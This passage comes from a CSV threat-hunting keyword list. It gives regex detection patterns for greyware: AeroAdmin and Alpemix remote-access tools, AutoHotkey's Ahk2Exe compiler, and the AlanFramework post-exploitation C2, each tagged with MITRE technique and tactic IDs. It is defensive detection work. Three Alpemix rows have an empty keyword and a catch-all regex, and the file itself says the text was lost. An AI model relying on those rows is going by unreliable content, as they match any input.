TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\Aeroadmin\*",".{0,1000}\\ProgramData\\Aeroadmin\\.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","C:\ProgramData\Aeroadmin\log.json","10","10","N/A","N/A","N/A","N/A" "*2ef8a13faa44755fab1ac6fb3665cc78f7e7b451*",".{0,1000}2ef8a13faa44755fab1ac6fb3665cc78f7e7b451.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Aeroadmin LLC*",".{0,1000}Aeroadmin\sLLC.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*AeroAdmin PRO - remote desktop.exe*",".{0,1000}AeroAdmin\sPRO\s\-\sremote\sdesktop\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AeroAdmin PRO.exe*",".{0,1000}AeroAdmin\sPRO\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AeroAdmin v4.* (*",".{0,1000}AeroAdmin\sv4\..{0,1000}\s\(.{0,1000}","greyware_tool_keyword","aeroadmin","RMM 
software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AeroAdmin.cpp*",".{0,1000}AeroAdmin\.cpp.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AEROADMIN.EXE-*.pf*",".{0,1000}AEROADMIN\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Aeroadmin\Screenshots*",".{0,1000}Aeroadmin\\Screenshots.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AeroAdmin_2.exe*",".{0,1000}AeroAdmin_2\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AeroadminService*",".{0,1000}AeroadminService.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","Service Name","10","10","N/A","N/A","N/A","N/A" "*auth*.aeroadmin.com*",".{0,1000}auth.{0,1000}\.aeroadmin\.com.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote 
control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*auth11.aeroadmin.com*",".{0,1000}auth11\.aeroadmin\.com.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*DEFAULT\Software\AeroAdmin*",".{0,1000}DEFAULT\\Software\\AeroAdmin.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*EE54577067550559C4711C9E5E10435807F9DEEE9A5ADB4409CB60A6B0108700*",".{0,1000}EE54577067550559C4711C9E5E10435807F9DEEE9A5ADB4409CB60A6B0108700.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*ulm.aeroadmin.com/*",".{0,1000}ulm\.aeroadmin\.com\/.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Ahk2Exe.exe*",".{0,1000}\sAhk2Exe\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" 
"*/Ahk2Exe.exe*",".{0,1000}\/Ahk2Exe\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/Ahk2Exe.git*",".{0,1000}\/Ahk2Exe\.git.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/Ahk2Exe.zip*",".{0,1000}\/Ahk2Exe\.zip.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/Ahk2Exe1.*.zip*",".{0,1000}\/Ahk2Exe1\..{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/ahk-install.exe*",".{0,1000}\/ahk\-install\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/ahk-v2.exe*",".{0,1000}\/ahk\-v2\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official 
AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/AutoHotkey_1*_setup.exe*",".{0,1000}\/AutoHotkey_1.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/AutoHotkey_2*_setup.exe*",".{0,1000}\/AutoHotkey_2.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/AutoHotkey64.exe*",".{0,1000}\/AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*/releases/download/Ahk2Exe*",".{0,1000}\/releases\/download\/Ahk2Exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\Ahk2Exe.ahk*",".{0,1000}\\Ahk2Exe\.ahk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script 
compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\Ahk2Exe.exe*",".{0,1000}\\Ahk2Exe\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\Ahk2Exe.zip*",".{0,1000}\\Ahk2Exe\.zip.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkey_1*_setup.exe*",".{0,1000}\\AutoHotkey_1.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkey_2*_setup.exe*",".{0,1000}\\AutoHotkey_2.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkey64.exe*",".{0,1000}\\AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious 
executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkey64_UIA.exe*",".{0,1000}\\AutoHotkey64_UIA\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkeySC.bin*",".{0,1000}\\AutoHotkeySC\.bin.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkeyU32.exe*",".{0,1000}\\AutoHotkeyU32\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\AutoHotkeyUX.exe*",".{0,1000}\\AutoHotkeyUX\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\Program Files\AutoHotkey*",".{0,1000}\\Program\sFiles\\AutoHotkey.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - 
T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\SetExeSubsystem.ahk*",".{0,1000}\\SetExeSubsystem\.ahk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\SOFTWARE\Classes\.ahk\*",".{0,1000}\\SOFTWARE\\Classes\\\.ahk\\.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\SOFTWARE\Classes\AutoHotkeyScript\*",".{0,1000}\\SOFTWARE\\Classes\\AutoHotkeyScript\\.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*\UX\reset-assoc.ahk*",".{0,1000}\\UX\\reset\-assoc\.ahk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*>AutoHotkey installer<*",".{0,1000}\>AutoHotkey\sinstaller\<.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 
- T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*>AutoHotkey Setup<*",".{0,1000}\>AutoHotkey\sSetup\<.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*14a8b1ff0297c5f7c06c6ab36a257140c2f3d33e8c15a28e790d5039a29c00a7*",".{0,1000}14a8b1ff0297c5f7c06c6ab36a257140c2f3d33e8c15a28e790d5039a29c00a7.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*41092e2433211a876f2b14f16a29fdae85a0d7e74565b23ab9e9c85bee892351*",".{0,1000}41092e2433211a876f2b14f16a29fdae85a0d7e74565b23ab9e9c85bee892351.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*46d335c6ebda027aea00f5a8261b4d1a1763e17b858fe512bbe541f9bb66d464*",".{0,1000}46d335c6ebda027aea00f5a8261b4d1a1763e17b858fe512bbe541f9bb66d464.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26*",".{0,1000}4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*4f30ed7899506d15974d12e428f4647660f97a52cc21da06a6a295a06197bbd8*",".{0,1000}4f30ed7899506d15974d12e428f4647660f97a52cc21da06a6a295a06197bbd8.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*7a2aeb7256c40efa434c6fc95f920ee9b4555e526f2f7cd325b6dc482faa7c20*",".{0,1000}7a2aeb7256c40efa434c6fc95f920ee9b4555e526f2f7cd325b6dc482faa7c20.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*80840379e83b70528c541218023961323ae10cfd85b4a1dcf6bf0fc01a9336b7*",".{0,1000}80840379e83b70528c541218023961323ae10cfd85b4a1dcf6bf0fc01a9336b7.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*80ce06d9341317b4c4b4b1e89b2f046e0426e1e952eaa9152231cc26a08de58f*",".{0,1000}80ce06d9341317b4c4b4b1e89b2f046e0426e1e952eaa9152231cc26a08de58f.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*9f2c7f990c554ba286616dd08e59ac32d543e80eef335f5c65762c020234bc1b*",".{0,1000}9f2c7f990c554ba286616dd08e59ac32d543e80eef335f5c65762c020234bc1b.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*ab464ef9bfa3735111e4fbf0e21f34feecf29a66d8effce37814df6be1d8314b*",".{0,1000}ab464ef9bfa3735111e4fbf0e21f34feecf29a66d8effce37814df6be1d8314b.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*AutoHotkey/Ahk2Exe*",".{0,1000}AutoHotkey\/Ahk2Exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" 
"*https://www.autohotkey.com/download/*",".{0,1000}https\:\/\/www\.autohotkey\.com\/download\/.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*s\AutoHotkey Window Spy.lnk*",".{0,1000}s\\AutoHotkey\sWindow\sSpy\.lnk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z" "*http*://127.0.0.1:8081*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:8081.{0,1000}","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","459","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*://localhost:8081*",".{0,1000}http.{0,1000}\:\/\/localhost\:8081.{0,1000}","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","459","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*/Alpemix.zip*",".{0,1000}\/Alpemix\.zip.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Apemix.exe*",".{0,1000}\/Apemix\.exe.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Alpemix.ini*",".{0,1000}\\Alpemix\.ini.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Alpemix.zip*",".{0,1000}\\Alpemix\.zip.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Apemix.exe*",".{0,1000}\\Apemix\.exe.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\AlpemixSrvcx*",".{0,1000}\\CurrentControlSet\\Services\\AlpemixSrvcx.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","keyword text missing (possibly lost in extraction) - pattern as written matches any input - restore from upstream before use","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 -
TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","keyword text missing (possibly lost in extraction) - pattern as written matches any input - restore from upstream before use","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","keyword text missing (possibly lost in extraction) - pattern as written matches any input - restore from upstream before use","10","10","N/A","N/A","N/A","N/A" "*3660fe9f10b94d38fecaea009e6625850a46b1d47bb7788fc47f286c1008e2ec*",".{0,1000}3660fe9f10b94d38fecaea009e6625850a46b1d47bb7788fc47f286c1008e2ec.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*6badff5495258b349559b9d2154ffcc7a435828dd57c4caf1c79f5d0ff9eb675*",".{0,1000}6badff5495258b349559b9d2154ffcc7a435828dd57c4caf1c79f5d0ff9eb675.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - 